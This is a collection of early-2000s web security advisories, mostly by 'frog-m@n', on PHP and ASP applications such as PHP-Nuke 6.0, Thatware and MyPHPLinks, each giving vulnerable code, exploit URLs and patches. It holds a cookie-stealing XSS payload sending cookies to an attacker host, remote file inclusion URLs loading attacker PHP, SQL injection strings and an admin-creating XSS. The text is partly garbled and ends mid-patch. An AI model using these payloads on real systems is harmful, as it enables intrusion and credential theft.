http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
OpenTopic security hole
Informations : °° Product : OpenTopic Website : http://www.infopop.com Version : 2.3.1 Problem : XSS (script injection) - Cookies recovery Location/Exploit : °° The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ). XSS to get cookie : [IMG]http://[website]/img.gifwidth=750height=750onmouseover=a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG] More details about XSS : In French : http://www.phpsecure.org/article/XSS.php Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.phpsecure.org%2Farticle%2FXSS.phplangpair=fr%7Cenhl=enie=ASCIIoe=ASCII frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
N/X (PHP)
Informations :
°°
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file
PHP Code/Location :
°°°
nx/common/cds/menu.inc.php :
---
[...]
require_once $c_path.common/lib/launch.inc.php;
[...]
---
nx/common/dbo/datasets.php :
---
?
require_once $c_path.common/dbo/saveset.php;
require_once $c_path.common/dbo/recordset.php;
require_once $c_path.common/dbo/deleteset.php;
require_once $c_path.common/dbo/updateset.php;
require_once $c_path.common/dbo/insertset.php;
[...]
---
nx/common/lib/mass_opeations.inc.php :
---
?
require_once $c_path.common/lib/launch.inc.php;
require_once $c_path.common/cds/menu.inc.php;
[...]
---
etc...
Exploits :
°°
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with :
http://[attacker]/common/lib/launch.inc.php
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
etc...
Solution :
°°
Add this line in bugged files :
-
if (!file_exists($c_path.index.php)){ die(Path not found.); }
-
A patch can be found on http://www.phpsecure.org .
More details :
°°
In French :
http://www.frog-man.org/tutos/NX.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
PEEL (PHP)
Informations :
°°
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file
PHP Code/Location :
°°°
modeles/haut.php :
---
?
$langfile = $dirroot./lang/.$SESSION[lang]./lang.php;
require ($langfile);
?
[...]
---
Exploit :
°
http://[target]/modeles/haut.php?dirroot=http://[attacker]SESSION=.
with :
http://[attacker]/lang/lang.php
Patch :
°°°
In modeles/haut.php replace the lines :
---
?
$langfile = $dirroot./lang/.$SESSION[lang]./lang.php;
require ($langfile);
?
---
by :
---
?
$langfile = $dirroot./lang/.$SESSION[lang]./lang.php;
if (file_exists($langfile)){
require ($langfile);
}
?
---
A patch can be found on http://www.phpsecure.org
More details :
°°
In French :
http://www.frog-man.org/tutos/PEEL.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
SPGpartenaires (PHP)
Informations :
°°
Version : ? - 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection - Access to member's accounts
PHP Code/Location :
°°°
modif/ident.php :
--
[...]
$sql=SELECT nomsite FROM SPGPartenaires WHERE id='.$id.' AND
motdepasse='.$pass.';
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header(location: index.php?msg=Identification+incorrecte+!);
}
else
{
setcookie(SPGP,$id.||.$pass,time()+84600,);
header(location: index2.php);
}
[...]
--
modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
--
?
if(!isset($SPGP))
{
header(location: index.php?msg=Veuillez+vous+identifier+!);
}
else
{
$inf=explode(||,$SPGP);
[...]
$sql=SELECT id FROM SPGPartenaires WHERE id='.$inf[0].' AND
motdepasse='.$inf[1].';
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header(location: index.php?msg=Veuillez+vous+identifier+!);
}
[...]
--
Exploits :
°°
http://[target]/modif/ident.php?id=[MEMBERID]pass='%20OR%20''='
or QUERY :
?SPGP=[ID]%7C%7C'%20OR%20''='
with :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php
Patch :
°°°
In modif/ident.php replace the line :
$sql=SELECT nomsite FROM SPGPartenaires WHERE id='.$id.' AND
motdepasse='.$pass.';
by :
---
$sql=SELECT nomsite FROM SPGPartenaires WHERE id='.addslashes($id).' AND
motdepasse='.addslashes($pass).';
---
And in the other files replace the line :
---
$sql=SELECT id FROM SPGPartenaires WHERE id='.$inf[0].' AND
motdepasse='.$inf[1].';
---
by :
---
$sql=SELECT id FROM SPGPartenaires WHERE id='.addslashes($inf[0]).' AND
motdepasse='.addslashes($inf[1]).';
---
A patch can be found on http://www.phpsecure.org.
More details :
°°
In French :
http://www.frog-man.org/tutos/SPGpartenaires.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
WAnewsletter (PHP)
Informations :
°°
Website : http://www.phpcodeur.net
Versions : 2.0beta - 2.1.0
Problem : Include file
PHP Code/Location :
°°°
newsletter.php 2.1beta - 2.1.0 :
if( !empty($HTTP_POST_VARS['action']) )
{
$action = $HTTP_POST_VARS['action'];
}
else if( !empty($HTTP_GET_VARS['action']) )
{
$action = $HTTP_GET_VARS['action'];
}
else
{
$action = '';
}
if( $action != '' || defined('IN_WA_FORM') )
{
$login = false;
include_once($waroot . 'start.php');
}
[...]
sql/db_type.php 2.0.2 - 2.1.0 :
switch($dbtype)
{
case 'mysql':
include_once($waroot . 'sql/mysql/mysql.inc.php');
break;
case 'mssql':
include_once($waroot . 'sql/mssql/mssql.inc.php');
break;
default:
echo 'bLe type de base de données n\'est pas défini !/b';
exit;
break;
}
[...]
etc...
Exploits :
°°
http://[target]/newsletter.php?action=1waroot=http://[attacker]/
http://[target]/sql/db_type.php?waroot=http://[attacker]/
Patch :
°°°
A patch can be found on http://www.phpsecure.org .
More details :
°°
In French :
http://www.frog-man.org/tutos/WAnewsletter.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWAnewsletter.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
PHP-Nuke 6.0 : Path Disclosure Cross Site Scripting
Informations :
°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS
Developpement :
°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :
---
if (!eregi(modules.php, $PHP_SELF)) {
die (You can't access this file directly...);
}
---
The second one (e.g. footer.php ) :
if (eregi(footer.php,$PHP_SELF)) {
Header(Location: index.php);
die();
}
Some files haven't these safety measures but they have security holes.
Exploits :
°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1
Path Disclosure Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or
http://[target]/modules/Forums/bb_smilies.php?site_font=}--/style[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=;[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver
- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver
- /modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name
- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1
Patch :
°°°
A patch can be found on http://www.phpsecure.org .
More details :
°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txtlangpair=fr%7Cenhl=enie=ASCIIoe=ASCII
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
Security Patchs for PHP Products
PHPSecure made some patchs for security holes in PHP products. Here is the list : - ALP - Banner Ad 2.0 : http://www.phpsecure.org/index.php?id=1zone=pDl More details : http://online.securityfocus.com/search?category=22query=ALP - Tight Auction 3.0 : http://www.phpsecure.org/index.php?id=6zone=pDl More details : http://online.securityfocus.com/search?category=22query=TightAuction - PY-Membres 3.1 : http://www.phpsecure.org/index.php?id=9zone=pDl More details : http://online.securityfocus.com/search?category=22query=PY-Membres - dobermann FORUM 0.5 : http://www.phpsecure.org/index.php?id=8zone=pDl More details : http://online.securityfocus.com/search?category=22query=dobermann FORUM - phpnewsDev 1 : http://www.phpsecure.org/index.php?id=10zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpnewsDev - KillerProtection 1 : http://www.phpsecure.org/index.php?id=11zone=pDl More details : http://online.securityfocus.com/search?category=22query=KillerProtection - phpSecurePages 0.27b : http://www.phpsecure.org/index.php?id=12zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpSecurePages - Avotravis 2.1 : http://www.phpsecure.org/index.php?id=13zone=pDl More details : http://online.securityfocus.com/search?category=22query=Avotravis - PunxNews 2.1 : http://www.phpsecure.org/index.php?id=14zone=pDl More details : http://online.securityfocus.com/search?category=22query=PunxNews - phpforge 2.3 : http://www.phpsecure.org/index.php?id=15zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpforge - phpforge 3b2 : http://www.phpsecure.org/index.php?id=60zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpforge - Inertianews 0.02 beta : http://www.phpsecure.org/index.php?id=17zone=pDl More details : http://online.securityfocus.com/search?category=22query=Inertianews - MySimpleNews 1 : http://www.phpsecure.org/index.php?id=16zone=pDl More details : http://online.securityfocus.com/search?category=22query=MySimpleNews - Pollen 1.4.1 : http://www.phpsecure.org/index.php?id=18zone=pDl More details : http://online.securityfocus.com/search?category=22query=Pollen - Pphlogger (Power Phlogger) 2.0.9 : http://www.phpsecure.org/index.php?id=7zone=pDl More details : http://online.securityfocus.com/search?category=22query=Pphlogger (Power Phlogger) - News Evolution 1.0 : http://www.phpsecure.org/index.php?id=21zone=pDl More details : http://online.securityfocus.com/search?category=22query=News Evolution - News Evolution 2.0 : http://www.phpsecure.org/index.php?id=22zone=pDl More details : http://online.securityfocus.com/search?category=22query=News Evolution - LokwaBB 1.2.2 : http://www.phpsecure.org/index.php?id=23zone=pDl More details : http://online.securityfocus.com/search?category=22query=LokwaBB - Rose 4.52 : http://www.phpsecure.org/index.php?id=24zone=pDl More details : http://online.securityfocus.com/search?category=22query=Rose - WebChat for XOOPS RC3 1-5 : http://www.phpsecure.org/index.php?id=25zone=pDl More details : http://online.securityfocus.com/search?category=22query=WebChat for XOOPS RC3 - EasyNews 4.2 , 4.3 : http://www.phpsecure.org/index.php?id=26zone=pDl More details : http://online.securityfocus.com/search?category=22query=EasyNews - Mon Album 0.6.2d : http://www.phpsecure.org/index.php?id=27zone=pDl More details : http://online.securityfocus.com/search?category=22query=Mon Album - XOOPS RC3 : http://www.phpsecure.org/index.php?id=61zone=pDl More details : http://online.securityfocus.com/search?category=22query=XOOPS - Photo Db 1.4 : http://www.phpsecure.org/index.php?id=28zone=pDl More details : http://online.securityfocus.com/search?category=22query=Photo Db - PHP Image View 1.0 : http://www.phpsecure.org/index.php?id=29zone=pDl More details : http://online.securityfocus.com/search?category=22query=PHP Image View - mcPass 1 : http://www.phpsecure.org/index.php?id=30zone=pDl More details : http://online.securityfocus.com/search?category=22query=mcPass - Pseudo-Frame 1.0 : http://www.phpsecure.org/index.php?id=31zone=pDl More details : http://online.securityfocus.com/search?category=22query=Pseudo-Frame - SimpleBBS 1.0.3 : http://www.phpsecure.org/index.php?id=32zone=pDl More details : http://online.securityfocus.com/search?category=22query=SimpleBBS - SimpleBBS 1.0.6 : http://www.phpsecure.org/index.php?id=33zone=pDl More details : http://online.securityfocus.com/search?category=22query=SimpleBBS - WSC (Web Server Creator) - Web Portal 0.1 : http://www.phpsecure.org/index.php?id=34zone=pDl More details : http://online.securityfocus.com/search?category=22query=WSC (Web Server Creator) - Web Portal - Immobilier 1 : http://www.phpsecure.org/index.php?id=35zone=pDl More details : http://online.securityfocus.com/search?category=22query=Immobilier - FreeNews 2.1 : http://www.phpsecure.org/index.php?id=20zone=pDl More details :
MyPHPLinks (PHP) : SQL Injection
Informations :
°°
Website : http://www.myphpsoft.net
Version : ? - 2.1.9, 2.2.0CVS
Problem : SQL Injection - Admin access
PHP Code/Location :
°°°
admin/auth/checksession.php
---
[...]
if($idsession!=''){
$dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser,
$MyPHPLinksPass);
if(!$dbs-connect())
die($dbs-error);
if(!$dbs-query(select count(*) as nb from .$MyPHPLinksTBAuth. where
session='.$idsession.' and timesession now()))
die($dbs-error);
while($dbs-nextrecord()){
$loginauth = $dbs-valeur(nb);
}
if ($loginauth==0){
header(Location:$MyPHPLinksAuthPErrDef);exit;
}else{
if(!$dbs-query(UPDATE .$MyPHPLinksTBAuth. set
timesession=now()+.$MyPHPLinksTLSession. where session='.$idsession.'))
die($dbs-error);
}
}else{
header(Location:$MyPHPLinksAuthPErrDef);exit;
}
?
---
Exploit :
°
http://[target]/admin/index.php?idsession='%20OR%20''='
Patch :
°°°
A patch can be downloaded on
http://www.phpsecure.org/index.php?zone=pPatchAsAlpha=m .
More details :
°°
In French :
http://www.frog-man.org/tutos/MyPhpLinks.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
Re: XSS and Path Disclosure in UPB
Anything about UPB was already wrote (1.1 1.0beta) : http://www.frogsecure.com/tutos/UPB.txt From: euronymous [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: XSS and Path Disclosure in UPB Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK) =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS and Path Disclosure in UPB product: Ultimate PHP Board (UPB) final beta 1.0 vendor: http://www.webrc.ca/php/upb.php risk: middle date: 12/7/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/009.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description --- 1) when calling add.php, which comming with upb, it output some error message, that contain foloving information: Warning: Failed opening 'textdb_v2.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/samcom/public_html/public/messageboard2/add.php on line 5 attempting to edit record... Fatal error: Call to undefined function: format_field() in /home/samcom/public_html/public/messageboard2/add.php on line 11 as you can see, script output contain full physical path of the board. 2). but if user has deleted this file (add.php) u can to view the full path in this way: == http://hostname.com/phorum/viewtopic.php?id=some_shitt_id=2 == cos the `id' parameter doesnt check if input data has entered correctly, then it output folloving error message: ===--=== snip = Warning: Unable to access ./data_dir/some_shit.dat in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 240 .. Warning: Supplied argument is not a valid File-Handle resource in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 241 .. === snip == where `data_dir' is the name of directory, where stored important files, eg users.dat with users passwords (md5). in default name of this directory is `db'. if user doesnt make this dir secure, then you can to get the users passwds with reading file users.dat (default name.. but it is an old stuff) and cracking the .md5 hashes. 3) cos the above, file viewtopic.php doesnt check at all, the you can insert some html in scripts output: http://hostname.com/phorum/viewtopic.php?id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3Et_id=2 [it must be in a single string] not URL-encoded string working fine also. ps. all of this issues applied to previus versions upb. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! and kate for she is kewl girl )) fuck_off: slavomira and other dirty ppl in *.kz im not a lame, not yet a hacker _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Thatware (PHP)
Informations :
°°
Versions : ? - 0.3 - 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection
PHP Code/Location :
°°°
artlist.php (v0.5.2, 0.5.3) :
-
include $root_path.'thatfile.php';
-
config.php (v? - 0.3 - 0.5.3) :
-
include $root_path.db_settings.php;
-
thatfile.php (v? - 0.3 - 0.5.2) :
if (!IsSet($thatfile)) {
include($root_path.config.php);
if (!IsSet($translation_set)) {
include $root_path.messages.$language.php; } #Translation module, even for
english needed!
auth.inc.php (v? - 0.3 - 0.5.0) :
$admintest = 0;
$mod_ok = 0;
$moderator = 0;
if(isset($user)) {
if (!$thatfile) include(thatfile.php);
$admin = base64_decode($user);
$admin = explode(:, $admin);
if (empty($admin[0]) || empty($admin[2])) exit;
$aid = $admin[1];
dbconnect();
$result=mysql_query(select rights from users where uid='$admin[0]' and
pass='$admin[2]');
if(!$result) {
echo Oh oh... select from database failed for admin check;
exit;
} else {
list($auth_rights)=mysql_fetch_row($result);
$auth_rights=explode(,,$auth_rights);
if (!empty($auth_rights)) {
$admintest=1;
if (inarray($auth_rights, 4)||inarray($auth_rights, 1)) {
$moderator=1;
$mod_ok=1;
}
}
}
}
Exploits :
°°
v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with
http://[attacker]/thatfile.php
v? - 0.3 - 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with
http://[attacker]/db_settings.php
v? - 0.3 - 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/language=1
with
http://[attacker]/config.php
and
http://[attacker]/messages.1.php
v? - 0.3 - 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=')
Patchs :
0.5.3:
http://www.phpsecure.org/patch/dl.php?id=47
0.5.2:
http://www.phpsecure.org/patch/dl.php?id=51
0.5.0:
http://www.phpsecure.org/patch/dl.php?id=50
0.4.5:
http://www.phpsecure.org/patch/dl.php?id=52
0.4.4:
http://www.phpsecure.org/patch/dl.php?id=49
0.4.3:
http://www.phpsecure.org/patch/dl.php?id=48
0.4.2:
http://www.phpsecure.org/patch/dl.php?id=53
0.4.1:
http://www.phpsecure.org/patch/dl.php?id=54
0.4:
http://www.phpsecure.org/patch/dl.php?id=55
0.3:
http://www.phpsecure.org/patch/dl.php?id=56
More details :
°°
In French :
http://www.frog-man.org/tutos/Thatware.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
FreeNews News Evolution (PHP)
Informations : °° Problem : Include files a) --- Product : Freenews Version : 2.1 Website : http://www.prologin.fr -- b) --- Product : News Evolution Versions : 1.0, 2.0 Website : http://www.phpevolution.net -- PHP Code/Location : °°° a) freenews 2.1 aff_news.php : - include ($chemin/config.php); include ($chemin/options.inc.php); include ($chemin/freenews_functions.inc.php); - ... b) News Evolution 1.0 aff_news.php : - include ($chemin/config.php); include ($chemin/functions.inc.php); include ($chemin/options.inc.php); - moteur/moteur.php : -- include ($chemin/moteur/moteur_form.php); include ($chemin/moteur/moteur_tab_results.php); -- export_news.php : --- include ($chemin/config.php); include ($chemin/functions.inc.php); include ($chemin/options.inc.php); include($chemin/exporthtm.inc.php); --- ... c) News Evolution 2.0 backend.php : - include_once($neurl/admin/modules/rss/easyRSS.inc.php); - screen.php : - include_once($neurl/admin/cfg/configsql.inc.php); include_once($neurl/admin/cfg/configscreen.inc.php); include_once($neurl/admin/cfg/configsite.inc.php); include_once($neurl/admin/cfg/configtache.inc.php); include_once($neurl/admin/$sitelang); include_once($neurl/admin/fonctions/fctscr.php); include_once($neurl/admin/fonctions/fctadmin.php); include_once($neurl/admin/fonctions/fctform.php); include_once($neurl/admin/modules/cache.php); - admin/modules/comment.php : - @include_once($neurl/admin/cfg/configscreen.inc.php); @include_once($neurl/admin/cfg/configsite.inc.php); @include_once($neurl/admin/$sitelang); - ... Exploits : °° a) freenews 2.1 http://[target]/aff_news.php?chemin=http://[attacker] with http://[attacker]/config.php http://[attacker]/options.inc.php http://[attacker]/freenews_functions.inc.php ... b) News Evolution 1.0 http://[target]/aff_news.php?chemin=http://[attacker]/ with http://[attacker]/config.php http://[attacker]/functions.inc.php http://[attacker]/options.inc.php ... c) News Evolution 2.0 http://[target]/screen.php?neurl=http://[attacker] with : http://[attacker]/admin/cfg/configsql.inc.php http://[attacker]/admin/cfg/configscreen.inc.php http://[attacker]/admin/cfg/configsite.inc.php http://[attacker]/admin/cfg/configtache.inc.php http://[attacker]/admin/fonctions/fctscr.php http://[attacker]/admin/fonctions/fctadmin.php http://[attacker]/admin/fonctions/fctform.php http://[attacker]/admin/modules/cache.php ... Patch : °°° http://www.phpsecure.org More details : °° In French : http://www.frog-man.org/tutos/NEfree.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Immobilier 1 (PHP)
Informations :
°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection
PHP Code/Location :
°°°
agentadmin.php :
--
[...]
} elseif ($agentname != OR $current_user != )
{
$sql = SELECT id FROM agents WHERE agent='$agentname' and
agentpass='$agentpassword';
$result = mysql_query($sql) or die(Couldn't execute query.);
$num = mysql_numrows($result);
if ($num == 1) {
session_register(agentname);
session_register(agentpassword);
[...]
session_register(current_user);
session_register(agent);
[...]
--
admin/phpinfo.php :
---
?
phpinfo();
?
---
Exploits :
°°
http://[target]/agentadmin.php?agentname='%20OR%20''='agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]agentpasword='%20OR%20''='
http://[target]/admin/phpinfo.php
Solutions :
°°°
- Delete /admin/phpinfo.php
- Put this lines :
--
$agentname=addslashes($agentname);
$currentuser=addslashes($currentuser);
$agentpassword=addslashes($agentpassword);
--
into common.php.
A patch can be found on http://www.phpsecure.org.
More details :
°°
In french :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
Web Server Creator - Web Portal 0.1 (PHP)
Informations :
°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file
PHP Code/Location :
°°°
news/include/customize.php :
--
?
$langfile = $l;
include $l;
?
--
index.php :
---
[...]
if (!$pg) { $pg = acceuil; }
[...]
require ($pg.php);
?
[...]
---
Exploits :
°°
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt
and
http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php
Solution :
°°
- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ($pg.php);
by :
---
if (file_exists($pg..php)){
require ($pg.php);
}
---
A patch can be found on http://www.phpsecure.org.
More details :
°°
In french :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
dobermann FORUM (php)
Informations :
°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file
PHP Code/location :
°°°
entete.php
enteteacceuil.php
topic/entete.php :
--
?php include $subpath.banniere.php; ?
--
index.php
newtopic.php :
require config.php;
include(entete.php);
Exploits :
°°
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php
Patch :
°°°
In files :
--
entete.php
enteteacceuil.php
topic/entete.php
--
replace the line :
--
?php include $subpath.banniere.php; ?
--
by :
--
?php
$banfile=$subpath.banniere.php;
if (file_exists($banfile)){
include $banfile; }
?
--
More details in french :
http://www.frog-man.org/tutos/dobermannFORUM.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-mn
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
gBook
Informations :
°°
Language : PHP
Tested version : 1.4
Problem : Admin access
PHP Code :
°°
/gb/index.php :
--
?php
include(config.inc.php);
if($action == login) {
if($user == $loginu $pw == $loginpw)
{
setcookie(login, true, time()+3600);
header(location: index.php);
}
else
{
setcookie(login, false, -3600);
header(location: index.php?fehler=login);
}
}
?
[...]
?php
if($login == true)
{
[ADMIN CODE]
[...]
--
Exploit :
°
http://[Target]/gb/index.php?login=true
Patch :
°°°
Using of .htaccess.
More details in french :
http://www.frog-man.org/tutos/gBook.txt
Translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII
frog-mn
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
phpnewsDev
Informations : °° Language : PHP Tested version : 1 Problem : bad use of include() PHP Code : °° ---Include/variables.php3--- ? $Mac=localhost; $Uti=root; $Mot=; $Bd=phpnews; $AnneeDeDemarrage=2000; $MoisDeDemarrage=8; $NbNouvelles=5; require($Include/french.inc); ? --- and Include/lib.inc.php3 : include($Include/config.inc.php3); Exploits : °° http://[target]/variables.php3?Include=http://[attacker] with in the file http://[attacker]/french.inc : ? print(centeruMySQL Infos/u/center\n\nServeur: $Mac \nLogin: $Uti \nPass: $Mot \nDB Name: $Bd); ? and http://[target]/Include/lib.inc.php3?http://[attacker] with in a bad php code in the file : http://[attacker]/config.inc.php3 Patch : °°° Add to the beginning of : -- Include/lib.inc.php3 Include/variables.php3 -- the line : $Include=Include; More details in french : http://www.frog-man.org/tutos/phpnewsDev.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII frog-mn _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
SSGbook (ASP)
Informations :
°°
Product : SSGbook
Langage : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting
PHP Code / location :
°
- config.asp --
fString = doCode(fString, [img],[/img],img src=, border=0)
fString = doCode(fString, [image],[/image],img src=, border=0)
fString = doCode(fString, [img=right],[/img=right],img align=right
src=, id=right border=0)
fString = doCode(fString, [image=right],[/image=right],img align=right
src=, id=right border=0)
fString = doCode(fString, [img=left],[/img=left],img align=left
src=, id=left border=0)
fString = doCode(fString, [image=left],[/image=left],img align=left
src=, id=left border=0)
- config.asp --
Exploit :
°
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]
e.g. :
[image]javascript:document.location=ss_admin.asp?Mode=UpdateActon=AccessUserName=PomPassword=turlututu;[/image]
Add an admin if an admin read it. Login : Pom, Password : turlututu
Patch :
°°°
In config.asp :
Add this line :
strOutput = Replace(strOutput, chr(34), quot;)
after
--
strOutput = Replace(strOutput, , lt;)
strOutput = Replace(strOutput, , gt;)
--
And replace this lines :
